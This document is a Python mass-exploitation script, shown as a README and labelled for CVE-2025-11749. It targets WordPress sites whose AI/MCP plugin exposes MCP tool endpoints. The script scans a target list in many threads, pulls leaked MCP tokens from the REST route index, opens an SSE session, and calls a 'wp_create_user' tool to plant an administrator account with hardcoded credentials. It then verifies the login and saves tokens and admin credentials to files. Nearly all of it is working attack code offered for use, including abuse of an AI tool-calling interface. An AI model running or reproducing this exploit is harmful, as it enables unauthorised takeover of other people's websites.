README.md
Rendering markdown...
# encoding: utf-8
# by: Nxploited ( Khaled Alenazi )
# Telegram: https://t.me/KNxploited
# GitHub: https://github.com/Nxploited
import threading
import requests
import time
import os
import sys
import urllib3
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich.theme import Theme
from rich import box
from random import randint
import json
init_theme = Theme({
"banner": "bold white on rgb(34,49,63)",
"usage": "bold bright_cyan on rgb(27,37,47)",
"info": "bold bright_magenta on rgb(31,31,37)",
"success": "bold white on green",
"error": "bold white on red",
"detect": "bold yellow on rgb(27,74,198)",
"progress": "bold magenta",
"highlight": "bold cyan on rgb(8,15,34)",
"tokenid": "bold white on rgb(38,154,16)",
"inputbox": "bold bright_magenta on rgb(27,74,198)",
})
console = Console(theme=init_theme)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
os.environ['NO_PROXY'] = '*'
Nxploited_success_file = "success_results.txt"
Nxploited_admin_file = "created_admins.txt"
Nxploited_tokens_file = "tokens_only.txt"
target_username = "nxploited"
target_password = "StrongPass!321"
target_email = "[email protected]"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
def Nxploited_write_token(target, token=None):
if token and token.strip():
with open(Nxploited_tokens_file, "a") as f:
f.write(f"{target} | token: {token}\n")
txt = f"[white]{target}[/white] | [bold cyan]token:[/bold cyan] [yellow]{token}[/yellow]"
console.print(txt, style="tokenid")
def professional_banner():
banner = """
=====================================================================================================================================
=== == ==== = ============= ===== ===== ==== ============= ======= ==== ====== ===== ===
== === = ==== = ================= = == == == = == =================== ====== ==== ===== ===== ==== === =
= ======= ==== = ================ === = ==== = === = ==================== ======= ========== ===== === ===== =
= ======= ==== = ===================== == ==== ====== == = =============== ======= ========= ===== = === ===== =
= ======= == = === ===== === ==== ===== === === == ==== ======= ======== ===== == ==== === =
= ======== == == =================== ==== ==== ==== ==== ===== ============= ======= ======= ===== === ====== = =
= ======== == == ================== ===== ==== === ============ ============= ======= ======= ===== ======== =
== === === === ================= ====== == == ====== ==== ============== ======= ======= ========== === ===== =
=== ===== ==== ========== === == ==== ============= === ===== ========== ==== ==
=====================================================================================================================================
"""
for line in banner.splitlines():
color = f"rgb({randint(34,85)},{randint(49,160)},{randint(63,255)})"
console.print(Text(line,style=color), style="banner")
time.sleep(0.002)
console.print("\n")
subtitle = "[highlight]Mass MCP Exploit | By: Khaled Alenazi (Nxploited)[/highlight]"
console.print(subtitle, style="info")
def show_usage_panel():
usage = (
"[usage]How to Use:[/usage]\n\n"
"[highlight]Step 1:[/] Place all target URLs in [bold]list.txt[/] (one URL per line).\n"
"[highlight]Step 2:[/] Run from terminal: [bold cyan]python CVE-2025-11749.py[/bold cyan]\n"
"[highlight]Step 3:[/] After pressing ENTER, enter the targets file and number of threads.\n"
"[highlight]Step 4:[/] Results saved to:\n"
" [bright_cyan]Success targets:[/] [bold]success_results.txt[/]\n"
" [bright_cyan]Created admins:[/] [bold]created_admins.txt[/]\n"
" [bright_cyan]Tokens:[/] [bold]tokens_only.txt[/]\n"
)
console.print(Panel(usage, box=box.ROUNDED, style="usage", border_style="cyan"))
def wait_enter():
msg = "[inputbox]Press ENTER to start exploitation or Ctrl+C to exit...[/inputbox]"
console.print(Panel(msg, box=box.ROUNDED, style="info"))
try:
input()
except KeyboardInterrupt:
console.print(Panel("[error]Exiting...[/error]", style="error"))
sys.exit(0)
def Nxploited_parse_args():
list_file = console.input("[inputbox]Enter target file name (e.g., list.txt):[/inputbox] ").strip()
threads = console.input("[inputbox]Enter number of threads (default 10):[/inputbox] ").strip()
if not threads.isdigit() or int(threads) < 1:
threads = 10
else:
threads = int(threads)
return list_file, threads
def Nxploited_internet_check():
while True:
try:
requests.head("https://www.google.com", timeout=4)
return True
except Exception:
console.print("[error]Internet disconnected. Waiting to resume...", style="error")
time.sleep(5)
def Nxploited_read_targets(filename):
targets = []
with open(filename, "r") as f:
for line in f:
url = line.strip()
if url:
if not url.lower().startswith(('http://', 'https://')):
url = 'http://' + url
targets.append(url)
return targets
def Nxploited_write_result(filename, msg):
with open(filename, "a") as f:
f.write(f"{msg}\n")
def check_plugin_installed(target_url):
try:
resp = requests.get(f"{target_url.rstrip('/')}/wp-json/", headers={'User-Agent': user_agent}, verify=False, timeout=10)
data = resp.json()
routes = list(data.get('routes', {}).keys())
mwai_found = any(r.startswith("/mwai/v1/") for r in routes)
mcp_found = any(r.startswith("/mcp/v1/") for r in routes)
return mwai_found or mcp_found
except Exception:
return False
def find_token(target_url):
try:
resp = requests.get(f"{target_url.rstrip('/')}/wp-json/mcp/v1/", headers={'User-Agent': user_agent}, verify=False, timeout=15)
j = resp.json()
for route in j.get("routes", {}):
parts = route.strip("/").split("/")
if len(parts) >= 4 and parts[0] == "mcp" and parts[1] == "v1" and parts[-1] == "sse":
token = parts[2]
if token and "/" not in token and "\\" not in token:
Nxploited_write_token(target_url, token=token)
return token
found = [x for x in j.get("routes", {}) if x.startswith("/mcp/v1/") and x.endswith("/sse")]
if found:
token = found[0].split("/")[4]
if token and "/" not in token and "\\" not in token:
Nxploited_write_token(target_url, token=token)
return token
except Exception:
pass
return None
def get_session_id(target_url, token):
url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse"
headers = {
"Accept": "text/event-stream",
"Connection": "keep-alive",
"Cache-Control": "no-cache",
"User-Agent": user_agent
}
try:
with requests.get(url, headers=headers, verify=False, timeout=10, stream=True) as resp:
for idx, line in enumerate(resp.iter_lines(decode_unicode=True)):
if line:
line_str = line.strip()
if line_str.startswith("id:"):
session_id = line_str.split("id:", 1)[-1].strip()
if session_id:
return session_id
if idx > 20:
break
except Exception: pass
return None
def try_exploit(target_url, token, session_id):
exploit_url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse"
payload = {
"jsonrpc": "2.0",
"id": 1337,
"method": "tools/call",
"params": {
"name": "wp_create_user",
"arguments": {
"user_login": target_username,
"user_email": target_email,
"user_pass": target_password,
"role": "administrator"
}
}
}
try:
resp = requests.post(
exploit_url,
headers={'Content-Type':'application/json', 'User-Agent':user_agent},
data=json.dumps(payload),
verify=False, timeout=30
)
try:
res_json = resp.json()
except Exception:
res_json = {}
try:
result = res_json.get("result", {})
content = result.get("content", [])
found_success = False
created_id = None
for item in content:
if isinstance(item, dict):
if "text" in item:
text = item["text"]
if "User created" in text and "ID" in text:
found_success = True
created_id = text
elif "success" in text or "created" in text:
found_success = True
if found_success:
break
if found_success:
return True, f"{target_url} | {target_username}:{target_password} | {created_id if created_id else ''}"
except Exception:
pass
if resp.status_code == 204:
return True, f"{target_url} | {target_username}:{target_password}"
return False, res_json
except Exception as e:
return False, str(e)
def login_and_confirm(target_url, username, password):
login_url = f"{target_url.rstrip('/')}/wp-login.php"
session = requests.Session()
try:
response = session.post(
login_url,
verify=False,
data={
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log+In'
},
headers={"User-Agent": user_agent}
)
logged_in = any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
success_conditions = [
logged_in,
'dashboard' in response.url.lower(),
'/wp-admin' in response.url.lower(),
'wp-admin' in response.text
]
return any(success_conditions)
except Exception:
return False
def print_success_box(target_url, login_success):
panel_text = (
f"\n[bold white on green]✔️ Exploitation Successful![/bold white on green]\n"
f"[bold blue]Target:[/] [bold white]{target_url}[/]\n"
f"[bold blue]WP Admin:[/] [bold green]{target_url.rstrip('/')}/wp-login.php[/]\n"
f"[bold magenta]Username:[/] [white]{target_username}\n"
f"[bold magenta]Password:[/] [white]{target_password}\n"
f"[bold yellow]Dashboard login: {'SUCCESSFUL' if login_success else 'FAILED'}[/bold yellow]\n"
)
console.print(Panel(panel_text, box=box.DOUBLE, style="success", border_style="green"))
def Nxploited_worker(thread_id, targets):
for target in targets:
Nxploited_internet_check()
if not check_plugin_installed(target):
console.print(f"{target} | Plugin not installed or not vulnerable.", style="error")
continue
else:
console.print(f"{target} | Plugin detected or vulnerable, exploiting...", style="detect")
token = find_token(target)
if not token:
console.print(f"{target} | Token not found, skipping.", style="error")
continue
session_id = get_session_id(target, token)
if not session_id:
console.print(f"{target} | Could not get session_id, skipping.", style="error")
continue
success, detail = try_exploit(target, token, session_id)
if not success:
console.print(f"{target} | Exploit failed.", style="error")
continue
login_success = login_and_confirm(target, target_username, target_password)
print_success_box(target, login_success)
if login_success:
Nxploited_write_result(Nxploited_success_file, f"{target} | {token} | {session_id}")
Nxploited_write_result(Nxploited_admin_file, detail)
else:
console.print(f"{target} | Admin created but login FAILED (credentials not saved).", style="error")
def Nxploited_chunkify(lst, n):
return [lst[i::n] for i in range(n)]
def Nxploited():
professional_banner()
show_usage_panel()
wait_enter()
list_file, num_threads = Nxploited_parse_args()
targets = Nxploited_read_targets(list_file)
console.print(Panel(
f"Preparing threads...",
box=box.ROUNDED, style="highlight", border_style="blue"
))
time.sleep(0.5)
target_chunks = Nxploited_chunkify(targets, num_threads)
threads = []
for i in range(num_threads):
th = threading.Thread(target=Nxploited_worker, args=(i, target_chunks[i]))
th.daemon = True
th.start()
threads.append(th)
for th in threads:
th.join()
console.print(Panel(
f"All targets processed.\nCheck [bold green]{Nxploited_success_file}[/] for successes.\nAdmin accounts saved in [bold green]{Nxploited_admin_file}[/]\nTokens saved in [bold green]{Nxploited_tokens_file}[/]",
box=box.DOUBLE, style="highlight", border_style="cyan"
))
if __name__ == "__main__":
Nxploited()